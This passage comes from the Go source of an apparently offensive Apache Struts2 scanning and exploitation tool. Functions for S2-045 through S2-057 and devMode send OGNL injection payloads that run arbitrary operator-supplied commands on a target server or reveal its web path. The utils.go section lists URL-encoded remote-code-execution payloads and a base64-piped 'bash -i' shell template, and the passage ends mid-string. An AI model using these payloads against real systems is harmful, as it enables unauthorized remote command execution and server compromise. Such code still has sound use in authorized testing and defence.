1023 | 		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
1024 | 			color.Red("*Found Struts2-045！")
1025 | 		} else {
1026 | 			fmt.Println("Struts2-045 Not Vulnerable.")
1027 | 		}
1028 | 	}
1029 | }
1030 | 
1031 | func (c *WorkExp) ExpS045Cmd() {
1032 | 	var (
1033 | 		resp *req.Response
1034 | 		err  error
1035 | 	)
1036 | 	Payload := strings.Replace(utils.ExecPayload045, "{cmd}", c.Cmd, -1)
1037 | 
1038 | 	if c.contentType == "" {
1039 | 		resp, err = client.R().
1040 | 			SetBody(c.postData).
1041 | 			SetHeader("Content-Type", Payload).
1042 | 			Post(c.Url)
1043 | 	}
1044 | 	if err != nil {
1045 | 
1046 | 	}
1047 | 	if resp != nil {
1048 | 		fmt.Println(resp.String())
1049 | 	}
1050 | }
1051 | 
1052 | func (c *WorkExp) ExpS045GetPath() {
1053 | 	var (
1054 | 		resp *req.Response
1055 | 		err  error
1056 | 	)
1057 | 	if c.contentType == "" {
1058 | 		resp, err = client.R().
1059 | 			SetBody(c.postData).
1060 | 			SetHeader("Content-Type", utils.WebPath045).
1061 | 			Post(c.Url)
1062 | 	}
1063 | 	if err != nil {
1064 | 
1065 | 	}
1066 | 	if resp != nil {
1067 | 		fmt.Println(resp.String())
1068 | 	}
1069 | }
1070 | 
1071 | // PocS046 S2-046:影响版本Struts 2.3.5-2.3.31,2.5-2.5.10; POST请求发送数据,不需要参数; 支持获取WEB路径,任意命令执行;
1072 | func (c *WorkExp) PocS046() {
1073 | 	var (
1074 | 		resp *req.Response
1075 | 		err  error
1076 | 	)
1077 | 	r1 := rand.Intn(10000) + 1000
1078 | 	r2 := rand.Intn(10000) + 1000
1079 | 	Payload := strings.Replace(utils.CheckPoc046, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
1080 | 	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
1081 | 	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
1082 | 
1083 | 	payload1 := `-----------------------------735323031399963166993862150 Content-Disposition: form-data; name="foo"; filename="%{(#nike='multipart/form-data').
1084 | {{payload}}
1085 | Content-Type: text/plain
1086 | 
1087 |  x 
1088 | -----------------------------735323031399963166993862150--`
1089 | 	c.postData = strings.Replace(payload1, "{{payload}}", Payload, -1)
1090 | 	if c.contentType == "" {
1091 | 		resp, err = client.R().
1092 | 			SetBody(c.postData).
1093 | 			SetHeader("Content-Type", "multipart/form-data; boundary=---------------------------735323031399963166993862150").
1094 | 			Post(c.Url)
1095 | 	}
1096 | 	if err != nil {
1097 | 
1098 | 	}
1099 | 	if resp != nil {
1100 | 		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
1101 | 			color.Red("*Found Struts2-046！")
1102 | 		} else {
1103 | 			fmt.Println("Struts2-046 Not Vulnerable.")
1104 | 		}
1105 | 	}
1106 | }
1107 | 
1108 | func (c *WorkExp) ExpS046Cmd() {
1109 | 	var (
1110 | 		resp *req.Response
1111 | 		err  error
1112 | 	)
1113 | 	Payload := strings.Replace(utils.ExecPayload046, "{cmd}", c.Cmd, -1)
1114 | 
1115 | 	payload1 := `-----------------------------735323031399963166993862150 
1116 | Content-Disposition: form-data; name="foo"; filename="%{(#nike='multipart/form-data').
1117 | {{payload}}
1118 | Content-Type: text/plain
1119 | 
1120 |  x 
1121 | -----------------------------735323031399963166993862150--`
1122 | 	c.postData = strings.Replace(payload1, "{{payload}}", Payload, -1)
1123 | 	if c.contentType == "" {
1124 | 		resp, err = client.R().
1125 | 			SetBody(c.postData).
1126 | 			SetHeader("Content-Type", "multipart/form-data; boundary=---------------------------735323031399963166993862150").
1127 | 			Post(c.Url)
1128 | 	}
1129 | 	if err != nil {
1130 | 
1131 | 	}
1132 | 	if resp != nil {
1133 | 		fmt.Println(resp.String())
1134 | 	}
1135 | }
1136 | 
1137 | func (c *WorkExp) ExpS046GetPath() {
1138 | 	var (
1139 | 		resp *req.Response
1140 | 		err  error
1141 | 	)
1142 | 	payload1 := `-----------------------------735323031399963166993862150 
1143 | Content-Disposition: form-data; name="foo"; filename="%{(#nike='multipart/form-data').
1144 | {{payload}}
1145 | Content-Type: text/plain  
1146 | 
1147 |  x 
1148 | -----------------------------735323031399963166993862150--`
1149 | 	c.postData = strings.Replace(payload1, "{{payload}}", utils.WebPath046, -1)
1150 | 	if c.contentType == "" {
1151 | 		resp, err = client.R().
1152 | 			SetBody(c.postData).
1153 | 			SetHeader("Content-Type", "multipart/form-data; boundary=---------------------------735323031399963166993862150").
1154 | 			Post(c.Url)
1155 | 	}
1156 | 	if err != nil {
1157 | 
1158 | 	}
1159 | 	if resp != nil {
1160 | 		fmt.Println(resp.String())
1161 | 	}
1162 | }
1163 | 
1164 | // PocS048 S2-048:影响版本Struts 2.3.x with Struts 1 plugin and Struts 1 action; POST请求发送数据; 默认参数为:username,password; 支持任意命令执行;
1165 | func (c *WorkExp) PocS048() {
1166 | 	var (
1167 | 		resp *req.Response
1168 | 		err  error
1169 | 	)
1170 | 	r1 := rand.Intn(10000) + 1000
1171 | 	r2 := rand.Intn(10000) + 1000
1172 | 	Payload := strings.Replace(utils.ExecPayload048, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
1173 | 	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
1174 | 	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
1175 | 	if c.postData == "" {
1176 | 		c.postData = "username=" + Payload
1177 | 	} else {
1178 | 		c.postData = strings.Replace(c.postData, "{exp}", Payload, -1)
1179 | 	}
1180 | 	if c.contentType == "" {
1181 | 		resp, err = client.R().
1182 | 			SetBody(c.postData).
1183 | 			SetHeader("Content-Type", "application/x-www-form-urlencoded").
1184 | 			Post(c.Url)
1185 | 	} else {
1186 | 		resp, err = client.R().
1187 | 			SetBody(c.postData).
1188 | 			SetHeader("Content-Type", c.contentType).
1189 | 			Post(c.Url)
1190 | 	}
1191 | 	if err != nil {
1192 | 
1193 | 	}
1194 | 	if resp != nil {
1195 | 		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
1196 | 			color.Red("*Found Struts2-048！")
1197 | 		} else {
1198 | 			if c.postData == "" {
1199 | 				c.postData = "password=" + Payload
1200 | 			} else {
1201 | 				c.postData = strings.Replace(c.postData, "{exp}", Payload, -1)
1202 | 			}
1203 | 			if c.contentType == "" {
1204 | 				resp, err = client.R().
1205 | 					SetBody(c.postData).
1206 | 					SetHeader("Content-Type", "application/x-www-form-urlencoded").
1207 | 					Post(c.Url)
1208 | 			} else {
1209 | 				resp, err = client.R().
1210 | 					SetBody(c.postData).
1211 | 					SetHeader("Content-Type", c.contentType).
1212 | 					Post(c.Url)
1213 | 			}
1214 | 			if err != nil {
1215 | 
1216 | 			}
1217 | 			if resp != nil {
1218 | 				if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
1219 | 					color.Red("*Found Struts2-048！")
1220 | 				} else {
1221 | 					fmt.Println("Struts2-048 Not Vulnerable.")
1222 | 				}
1223 | 			}
1224 | 		}
1225 | 	}
1226 | }
1227 | 
1228 | func (c *WorkExp) ExpS048Cmd() {
1229 | 	var (
1230 | 		resp *req.Response
1231 | 		err  error
1232 | 	)
1233 | 
1234 | 	Payload := strings.Replace(utils.ExecPayload048, "{cmd}", c.Cmd, -1)
1235 | 	if c.postData == "" {
1236 | 		c.postData = "username=" + Payload
1237 | 	} else {
1238 | 		c.postData = strings.Replace(c.postData, "{exp}", Payload, -1)
1239 | 	}
1240 | 	if c.contentType == "" {
1241 | 		resp, err = client.R().
1242 | 			SetBody(c.postData).
1243 | 			SetHeader("Content-Type", "application/x-www-form-urlencoded").
1244 | 			Post(c.Url)
1245 | 	} else {
1246 | 		resp, err = client.R().
1247 | 			SetBody(c.postData).
1248 | 			SetHeader("Content-Type", c.contentType).
1249 | 			Post(c.Url)
1250 | 	}
1251 | 	if err != nil {
1252 | 
1253 | 	}
1254 | 	if resp != nil {
1255 | 		fmt.Println(resp.String())
1256 | 	}
1257 | 
1258 | 	if c.postData == "" {
1259 | 		c.postData = "password=" + Payload
1260 | 	} else {
1261 | 		c.postData = strings.Replace(c.postData, "{exp}", Payload, -1)
1262 | 	}
1263 | 	if c.contentType == "" {
1264 | 		resp, err = client.R().
1265 | 			SetBody(c.postData).
1266 | 			SetHeader("Content-Type", "application/x-www-form-urlencoded").
1267 | 			Post(c.Url)
1268 | 	} else {
1269 | 		resp, err = client.R().
1270 | 			SetBody(c.postData).
1271 | 			SetHeader("Content-Type", c.contentType).
1272 | 			Post(c.Url)
1273 | 	}
1274 | 	if err != nil {
1275 | 
1276 | 	}
1277 | 	if resp != nil {
1278 | 		fmt.Println(resp.String())
1279 | 	}
1280 | }
1281 | 
1282 | // ExpS052Cmd S2-052:影响版本Struts 2.1.2-2.3.33,2.5-2.5.12; POST请求发送数据,不需要参数; 支持任意命令执行(无回显);
1283 | func (c *WorkExp) ExpS052Cmd() {
1284 | 	var (
1285 | 		resp *req.Response
1286 | 		err  error
1287 | 	)
1288 | 	c.postData = strings.Replace(utils.ExecPayload052, "{cmd}", c.Cmd, -1)
1289 | 	if c.contentType == "" {
1290 | 		resp, err = client.R().
1291 | 			SetBody(c.postData).
1292 | 			SetHeader("Content-Type", "application/xml").
1293 | 			Post(c.Url)
1294 | 	}
1295 | 	if err != nil {
1296 | 
1297 | 	}
1298 | 	if resp != nil {
1299 | 		fmt.Println(resp)
1300 | 	}
1301 | }
1302 | 
1303 | // PocS053 S2-053:影响版本Struts 2.0.1-2.3.33,2.5-2.5.10; POST请求发送数据; 默认参数为:username,password; 支持任意命令执行;
1304 | func (c *WorkExp) PocS053() {
1305 | 	var (
1306 | 		resp *req.Response
1307 | 		err  error
1308 | 	)
1309 | 	r1 := rand.Intn(10000) + 1000
1310 | 	r2 := rand.Intn(10000) + 1000
1311 | 	Payload := strings.Replace(utils.ExecPayload053, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
1312 | 	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
1313 | 	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
1314 | 	if c.postData == "" {
1315 | 		c.postData = "username=" + Payload
1316 | 	} else {
1317 | 		c.postData = strings.Replace(c.postData, "{exp}", Payload, -1)
1318 | 	}
1319 | 	if c.contentType == "" {
1320 | 		resp, err = client.R().
1321 | 			SetBody(c.postData).
1322 | 			SetHeader("Content-Type", "application/x-www-form-urlencoded").
1323 | 			Post(c.Url)
1324 | 	} else {
1325 | 		resp, err = client.R().
1326 | 			SetBody(c.postData).
1327 | 			SetHeader("Content-Type", c.contentType).
1328 | 			Post(c.Url)
1329 | 	}
1330 | 	if err != nil {
1331 | 
1332 | 	}
1333 | 	if resp != nil {
1334 | 		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
1335 | 			color.Red("*Found Struts2-053！")
1336 | 		} else {
1337 | 			if c.postData == "" {
1338 | 				c.postData = "password=" + Payload
1339 | 			} else {
1340 | 				c.postData = strings.Replace(c.postData, "{exp}", Payload, -1)
1341 | 			}
1342 | 			if c.contentType == "" {
1343 | 				resp, err = client.R().
1344 | 					SetBody(c.postData).
1345 | 					SetHeader("Content-Type", "application/x-www-form-urlencoded").
1346 | 					Post(c.Url)
1347 | 			} else {
1348 | 				resp, err = client.R().
1349 | 					SetBody(c.postData).
1350 | 					SetHeader("Content-Type", c.contentType).
1351 | 					Post(c.Url)
1352 | 			}
1353 | 			if err != nil {
1354 | 
1355 | 			}
1356 | 			if resp != nil {
1357 | 				if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
1358 | 					color.Red("*Found Struts2-053！")
1359 | 				} else {
1360 | 					fmt.Println("Struts2-053 Not Vulnerable.")
1361 | 				}
1362 | 			}
1363 | 		}
1364 | 	}
1365 | }
1366 | 
1367 | func (c *WorkExp) ExpS053Cmd() {
1368 | 	var (
1369 | 		resp *req.Response
1370 | 		err  error
1371 | 	)
1372 | 	Payload := strings.Replace(utils.ExecPayload053, "{cmd}", c.Cmd, -1)
1373 | 	if c.postData == "" {
1374 | 		c.postData = "username=" + Payload
1375 | 	} else {
1376 | 		c.postData = strings.Replace(c.postData, "{exp}", Payload, -1)
1377 | 	}
1378 | 	if c.contentType == "" {
1379 | 		resp, err = client.R().
1380 | 			SetBody(c.postData).
1381 | 			SetHeader("Content-Type", "application/x-www-form-urlencoded").
1382 | 			Post(c.Url)
1383 | 	} else {
1384 | 		resp, err = client.R().
1385 | 			SetBody(c.postData).
1386 | 			SetHeader("Content-Type", c.contentType).
1387 | 			Post(c.Url)
1388 | 	}
1389 | 	if err != nil {
1390 | 
1391 | 	}
1392 | 	if resp != nil {
1393 | 		fmt.Println(resp.String())
1394 | 	}
1395 | 
1396 | 	if c.postData == "" {
1397 | 		c.postData = "password=" + Payload
1398 | 	} else {
1399 | 		c.postData = strings.Replace(c.postData, "{exp}", Payload, -1)
1400 | 	}
1401 | 	if c.contentType == "" {
1402 | 		resp, err = client.R().
1403 | 			SetBody(c.postData).
1404 | 			SetHeader("Content-Type", "application/x-www-form-urlencoded").
1405 | 			Post(c.Url)
1406 | 	} else {
1407 | 		resp, err = client.R().
1408 | 			SetBody(c.postData).
1409 | 			SetHeader("Content-Type", c.contentType).
1410 | 			Post(c.Url)
1411 | 	}
1412 | 	if err != nil {
1413 | 
1414 | 	}
1415 | 	if resp != nil {
1416 | 		fmt.Println(resp.String())
1417 | 	}
1418 | 
1419 | }
1420 | 
1421 | // PocDevMode S2-devMode:影响版本Struts 2.1.0-2.3.1; GET请求发送数据; 支持获取WEB路径,任意命令执行
1422 | func (c *WorkExp) PocDevMode() {
1423 | 	r1 := rand.Intn(10000) + 1000
1424 | 	r2 := rand.Intn(10000) + 1000
1425 | 	Payload := c.Url + utils.ExecPayloadDevMode
1426 | 	Payload = strings.Replace(Payload, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
1427 | 	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
1428 | 	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
1429 | 	resp, err := client.R().
1430 | 		Get(Payload)
1431 | 	if err != nil {
1432 | 
1433 | 	}
1434 | 	if resp != nil {
1435 | 		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
1436 | 			color.Red("*Found Struts2-devMode！")
1437 | 		} else {
1438 | 			fmt.Println("Struts2-devMode Not Vulnerable.")
1439 | 		}
1440 | 	}
1441 | }
1442 | 
1443 | func (c *WorkExp) ExpDevModeCmd() {
1444 | 	Payload := c.Url + utils.ExecPayloadDevMode
1445 | 	Payload = strings.Replace(Payload, "{cmd}", c.Cmd, -1)
1446 | 	resp, err := client.R().
1447 | 		Get(Payload)
1448 | 	if err != nil {
1449 | 
1450 | 	}
1451 | 	if resp != nil {
1452 | 		fmt.Println(resp.String())
1453 | 	}
1454 | }
1455 | 
1456 | func (c *WorkExp) ExpDevModeGetPath() {
1457 | 	Payload := c.Url + utils.WebPathDevMode
1458 | 	resp, err := client.R().
1459 | 		Get(Payload)
1460 | 	if err != nil {
1461 | 
1462 | 	}
1463 | 	if resp != nil {
1464 | 		fmt.Println(resp.String())
1465 | 	}
1466 | }
1467 | 
1468 | // PocS057 S2-057:影响版本Struts 2.0.4-2.3.34, Struts 2.5.0-2.5.16; GET请求发送数据; 支持任意命令执行
1469 | func (c *WorkExp) PocS057() {
1470 | 	r1 := rand.Intn(10000) + 1000
1471 | 	r2 := rand.Intn(10000) + 1000
1472 | 	Payload := c.Url + utils.ExecPayload057a
1473 | 	Payload = strings.Replace(Payload, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
1474 | 	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
1475 | 	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
1476 | 	resp, err := client.R().
1477 | 		Get(Payload)
1478 | 	if err != nil {
1479 | 
1480 | 	}
1481 | 	if resp != nil {
1482 | 		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
1483 | 			color.Red("*Found Struts2-057！-> ExecPayload057a")
1484 | 		} else {
1485 | 			fmt.Println("Struts2-057 Not Vulnerable. -> ExecPayload057a")
1486 | 		}
1487 | 	}
1488 | 
1489 | 	Payload = c.Url + utils.ExecPayload057b
1490 | 	Payload = strings.Replace(Payload, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
1491 | 	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
1492 | 	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
1493 | 	resp, err = client.R().
1494 | 		Get(Payload)
1495 | 	if err != nil {
1496 | 
1497 | 	}
1498 | 	if resp != nil {
1499 | 		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
1500 | 			color.Red("*Found Struts2-057！-> ExecPayload057b")
1501 | 		} else {
1502 | 			fmt.Println("Struts2-057 Not Vulnerable. -> ExecPayload057b")
1503 | 		}
1504 | 	}
1505 | 
1506 | 	Payload = c.Url + utils.ExecPayload057c
1507 | 	Payload = strings.Replace(Payload, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
1508 | 	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
1509 | 	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
1510 | 	resp, err = client.R().
1511 | 		Get(Payload)
1512 | 	if err != nil {
1513 | 
1514 | 	}
1515 | 	if resp != nil {
1516 | 		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
1517 | 			color.Red("*Found Struts2-057！-> ExecPayload057c")
1518 | 		} else {
1519 | 			fmt.Println("Struts2-057 Not Vulnerable. -> ExecPayload057c")
1520 | 		}
1521 | 	}
1522 | 
1523 | 	Payload = c.Url + utils.ExecPayload057d
1524 | 	Payload = strings.Replace(Payload, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
1525 | 	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
1526 | 	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
1527 | 	resp, err = client.R().
1528 | 		Get(Payload)
1529 | 	if err != nil {
1530 | 
1531 | 	}
1532 | 	if resp != nil {
1533 | 		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
1534 | 			color.Red("*Found Struts2-057！-> ExecPayload057d")
1535 | 		} else {
1536 | 			fmt.Println("Struts2-057 Not Vulnerable. -> ExecPayload057d")
1537 | 		}
1538 | 	}
1539 | }
1540 | 
1541 | func (c *WorkExp) ExpS057Cmd() {
1542 | 	Payload := c.Url + utils.ExecPayload057a
1543 | 	Payload = strings.Replace(Payload, "{cmd}", c.Cmd, -1)
1544 | 	resp, err := client.R().
1545 | 		Get(Payload)
1546 | 	if err != nil {
1547 | 
1548 | 	}
1549 | 	if resp != nil {
1550 | 		fmt.Println(resp.String())
1551 | 	}
1552 | 
1553 | 	Payload = c.Url + utils.ExecPayload057b
1554 | 	Payload = strings.Replace(Payload, "{cmd}", c.Cmd, -1)
1555 | 	resp, err = client.R().
1556 | 		Get(Payload)
1557 | 	if err != nil {
1558 | 
1559 | 	}
1560 | 	if resp != nil {
1561 | 		fmt.Println(resp.String())
1562 | 	}
1563 | 
1564 | 	Payload = c.Url + utils.ExecPayload057c
1565 | 	Payload = strings.Replace(Payload, "{cmd}", c.Cmd, -1)
1566 | 	resp, err = client.R().
1567 | 		Get(Payload)
1568 | 	if err != nil {
1569 | 
1570 | 	}
1571 | 	if resp != nil {
1572 | 		fmt.Println(resp.String())
1573 | 	}
1574 | 
1575 | 	Payload = c.Url + utils.ExecPayload057d
1576 | 	Payload = strings.Replace(Payload, "{cmd}", c.Cmd, -1)
1577 | 	resp, err = client.R().
1578 | 		Get(Payload)
1579 | 	if err != nil {
1580 | 
1581 | 	}
1582 | 	if resp != nil {
1583 | 		fmt.Println(resp.String())
1584 | 	}
1585 | }
1586 | 
1587 | func (c *WorkExp) Run() {
1588 | 	switch c.CveName {
1589 | 	// s2-001
1590 | 	case "s2-001":
1591 | 		c.PocS001()
1592 | 	case "s2-001_Cmd":
1593 | 		c.ExpS001Cmd()
1594 | 	case "s2-001_WebPath":
1595 | 		c.ExpS001GetPath()
1596 | 		// s2-003
1597 | 	case "s2-003":
1598 | 		c.PocS003()
1599 | 	case "s2-003_Cmd":
1600 | 		c.ExpS003Cmd()
1601 | 		// s2-005
1602 | 	case "s2-005":
1603 | 		c.PocS005()
1604 | 	case "s2-005_Cmd":
1605 | 		c.ExpS005Cmd()
1606 | 	case "s2-005_WebPath":
1607 | 		c.ExpS005GetPath()
1608 | 		//s2-007
1609 | 	case "s2-007":
1610 | 		c.PocS007()
1611 | 	case "s2-007_Cmd":
1612 | 		c.ExpS007Cmd()
1613 | 		//s2-008
1614 | 	case "s2-008":
1615 | 		c.PocS008()
1616 | 	case "s2-008_Cmd":
1617 | 		c.ExpS008Cmd()
1618 | 		//s2-009
1619 | 	case "s2-009":
1620 | 		c.PocS009()
1621 | 	case "s2-009_Cmd":
1622 | 		c.ExpS009Cmd()
1623 | 		//s2-012
1624 | 	case "s2-012":
1625 | 		c.PocS012()
1626 | 	case "s2-012_Cmd":
1627 | 		c.ExpS012Cmd()
1628 | 		//s2-013
1629 | 	case "s2-013":
1630 | 		c.PocS013()
1631 | 	case "s2-013_Cmd":
1632 | 		c.ExpS013Cmd()
1633 | 	case "s2-012_WebPath":
1634 | 		c.ExpS013GetPath()
1635 | 		//s2-015
1636 | 	case "s2-015":
1637 | 		c.PocS015()
1638 | 	case "s2-015_Cmd":
1639 | 		c.ExpS015Cmd()
1640 | 		//s2-016
1641 | 	case "s2-016":
1642 | 		c.PocS016()
1643 | 	case "s2-016_Cmd":
1644 | 		c.ExpS016Cmd()
1645 | 	case "s2-016_WebPath":
1646 | 		c.ExpS016GetPath()
1647 | 		//s2-019
1648 | 	case "s2-019":
1649 | 		c.PocS019()
1650 | 	case "s2-019_Cmd":
1651 | 		c.ExpS019Cmd()
1652 | 	case "s2-019_WebPath":
1653 | 		c.ExpS019GetPath()
1654 | 		//s2-029
1655 | 	case "s2-029":
1656 | 		c.PocS029()
1657 | 	case "s2-029_Cmd":
1658 | 		c.ExpS029Cmd()
1659 | 		//s2-032
1660 | 	case "s2-032":
1661 | 		c.PocS032()
1662 | 	case "s2-032_Cmd":
1663 | 		c.ExpS032Cmd()
1664 | 	case "s2-032_WebPath":
1665 | 		c.ExpS032GetPath()
1666 | 		//s2-033
1667 | 	case "s2-033":
1668 | 		c.PocS033()
1669 | 	case "s2-033_Cmd":
1670 | 		c.ExpS033Cmd()
1671 | 		//s2-037
1672 | 	case "s2-037":
1673 | 		c.PocS037()
1674 | 	case "s2-037_Cmd":
1675 | 		c.ExpS037Cmd()
1676 | 	case "s2-037_WebPath":
1677 | 		c.ExpS037GetPath()
1678 | 		//s2-045
1679 | 	case "s2-045":
1680 | 		c.PocS045()
1681 | 	case "s2-045_Cmd":
1682 | 		c.ExpS045Cmd()
1683 | 	case "s2-045_WebPath":
1684 | 		c.ExpS045GetPath()
1685 | 		//s2-046
1686 | 	case "s2-046":
1687 | 		c.PocS046()
1688 | 	case "s2-046_Cmd":
1689 | 		c.ExpS046Cmd()
1690 | 	case "s2-046_WebPath":
1691 | 		c.ExpS046GetPath()
1692 | 		//s2-048
1693 | 	case "s2-048":
1694 | 		c.PocS048()
1695 | 	case "s2-048_Cmd":
1696 | 		c.ExpS048Cmd()
1697 | 		//s2-052
1698 | 	case "s2-052_Cmd":
1699 | 		c.ExpS052Cmd()
1700 | 		//s2-053
1701 | 	case "s2-053":
1702 | 		c.PocS053()
1703 | 	case "s2-053_Cmd":
1704 | 		c.ExpS053Cmd()
1705 | 		//s2-devMode
1706 | 	case "s2-devMode":
1707 | 		c.PocDevMode()
1708 | 	case "s2-devMode_Cmd":
1709 | 		c.ExpDevModeCmd()
1710 | 	case "s2-devMode_WebPath":
1711 | 		c.ExpDevModeGetPath()
1712 | 		// s2-057
1713 | 	case "s2-057":
1714 | 		c.PocS057()
1715 | 	case "s2-057_Cmd":
1716 | 		c.ExpS057Cmd()
1717 | 	case "allPoc":
1718 | 		c.PocS001()
1719 | 		c.PocS003()
1720 | 		c.PocS005()
1721 | 		c.PocS007()
1722 | 		c.PocS008()
1723 | 		c.PocS009()
1724 | 		c.PocS012()
1725 | 		c.PocS013()
1726 | 		c.PocS015()
1727 | 		c.PocS016()
1728 | 		c.PocS019()
1729 | 		c.PocS029()
1730 | 		c.PocS032()
1731 | 		c.PocS033()
1732 | 		c.PocS037()
1733 | 		c.PocS045()
1734 | 		c.PocS046()
1735 | 		c.PocS048()
1736 | 		c.PocS053()
1737 | 		c.PocDevMode()
1738 | 		c.PocS057()
1739 | 	}
1740 | }
1741 | 


--------------------------------------------------------------------------------
/pkg/utils/utils.go:
--------------------------------------------------------------------------------
  1 | package utils
  2 | 
  3 | var (
  4 | 	// GlobalUserAgent User Agent
  5 | 	GlobalUserAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
  6 | 	// CheckPoc S2-001
  7 | 	CheckPoc    = "%25%7B{num1}%2B{num2}%7D"
  8 | 	WebPath     = "%25%7B%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C%23response%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23response.println(%23req.getRealPath('%2F'))%2C%23response.flush()%2C%23response.close()%7D"
  9 | 	ExecPayload = "%25%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B{cmd}%7D)).redirectErrorStream(true).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23f%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22)%2C%23f.getWriter().println(new%20java.lang.String(%23e))%2C%23f.getWriter().flush()%2C%23f.getWriter().close()%7D"
 10 | 	Shell       = "bash -c {echo,SHELL}|{base64,-d}|{bash,-i}"
 11 | )
 12 | 
 13 | // Exec_payload s2-003
 14 | var Exec_payload = "%28%27%5Cu0023context[%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27]%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27{cmd}%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte[51020]%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29"
 15 | 
 16 | // s2-005
 17 | var (
 18 | 	Web_path      = "%28%27%5C43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27%5C43context[%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27]%5C75false%27%29%28b%29%29&%28%27%5C43c%27%29%28%28%27%5C43_memberAccess.excludeProperties%5C75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27%5C43req%5C75@org.apache.struts2.ServletActionContext@getRequest%28%29%27%29%28d%29%29&%28i2%29%28%28%27%5C43xman%5C75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28i97%29%28%28%27%5C43xman.getWriter%28%29.println%28%5C43req.getRealPath%28%22%5Cu005c%22%29%29%27%29%28d%29%29&%28i99%29%28%28%27%5C43xman.getWriter%28%29.close%28%29%27%29%28d%29%29"
 19 | 	Exec_payload1 = "%28%27%5Cu0023context[%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27]%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023_memberAccess.allowStaticMethodAccess%5Cu003dtrue%27%29%28bla%29%28bla%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27{cmd}%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte[51020]%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java